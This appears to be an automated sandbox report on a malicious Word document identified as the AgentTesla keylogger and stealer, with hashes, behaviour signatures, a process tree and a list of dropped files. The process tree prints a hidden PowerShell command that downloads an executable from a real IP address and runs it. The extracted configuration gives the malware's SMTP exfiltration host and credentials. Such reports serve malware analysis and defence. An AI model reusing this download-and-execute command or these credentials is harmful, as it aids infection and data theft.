Overview

overview

10

Static

static

8

PL_056_06_713.doc

windows7_x64

10

PL_056_06_713.doc

windows10_x64

1

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    11-05-2021 08:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    PL_056_06_713.doc

  • Size

    387KB

  • MD5

    7ea976fa35d432a5f1fbd95fedb6b491

  • SHA1

    372fbcd853b6e3143abce13481b38a398a18d1c2

  • SHA256

    5559a0af254ec91974ee7dbc6e48ded1b27e0b0bba31e8a5a7c3d935cbb3a134

  • SHA512

    99665619c7b952edf1a443c237faf6ec33652710b6717128e5e80babc7c919faaf2305d8bdc3267311fa369329f03dd66cfb7561ea4875162e6c7ca2911d4910

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    sixjan.xyz
  • Port:
    587
  • Username:
    zenom@sixjan.xyz
  • Password:
    7&JWw;63ncJ^

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • AgentTesla Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\PL_056_06_713.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1608
    • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
      1⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1764
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w Hidden Invoke-WebRequest -Uri "http://31.210.20.6/w2/Qquabsz.exe" -OutFile "C:\Users\Public\Documents\jobtogether.exe";C:\Users\Public\Documents\jobtogether.exe
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Users\Public\Documents\jobtogether.exe
          "C:\Users\Public\Documents\jobtogether.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:960
          • C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
            C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:240

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • C:\Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • C:\Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Admin\AppData\Local\Temp\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • \Users\Public\Documents\jobtogether.exe
      MD5

      e605817ed935ee0301f12f5e8c72d72a

      SHA1

      3733b3a33456e6aa9d604c04d1531848ccd0a77d

      SHA256

      ef84b2ff04124e92bb1f3cd7d7ea4f8c61d130b0171a66586fb72ce46a28057b

      SHA512

      5c80094058431e7282b3015624832bba46afb209b4df0a9369a84dc38d9b7b047d56f90ab3af1ad99259027574f8d348f80a3086f2740a5ddfa1e1899b09408a

      Download Submit
    • memory/240-113-0x0000000002230000-0x0000000002231000-memory.dmp
      Filesize

      4KB

      Download
    • memory/240-111-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/240-107-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/240-108-0x000000000043761E-mapping.dmp
      Download
    • memory/572-68-0x0000000004960000-0x0000000004961000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-72-0x0000000002750000-0x0000000002751000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-88-0x0000000006460000-0x0000000006461000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-89-0x0000000006490000-0x0000000006491000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-90-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-80-0x0000000006200000-0x0000000006201000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-75-0x0000000006180000-0x0000000006181000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-81-0x00000000062A0000-0x00000000062A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-70-0x0000000004920000-0x0000000004921000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-71-0x0000000004922000-0x0000000004923000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-69-0x00000000023D0000-0x00000000023D1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-67-0x0000000001D90000-0x0000000001D91000-memory.dmp
      Filesize

      4KB

      Download
    • memory/572-66-0x0000000075011000-0x0000000075013000-memory.dmp
      Filesize

      8KB

      Download
    • memory/572-65-0x0000000000000000-mapping.dmp
      Download
    • memory/960-93-0x0000000000000000-mapping.dmp
      Download
    • memory/960-102-0x00000000046F0000-0x000000000477A000-memory.dmp
      Filesize

      552KB

      Download
    • memory/960-103-0x0000000000BE0000-0x0000000000C31000-memory.dmp
      Filesize

      324KB

      Download
    • memory/960-99-0x00000000047A0000-0x00000000047A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/960-97-0x0000000000F00000-0x0000000000F01000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1608-101-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1608-100-0x0000000000000000-mapping.dmp
      Download
    • memory/1684-60-0x0000000072661000-0x0000000072664000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1684-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1684-61-0x00000000700E1000-0x00000000700E3000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1684-114-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download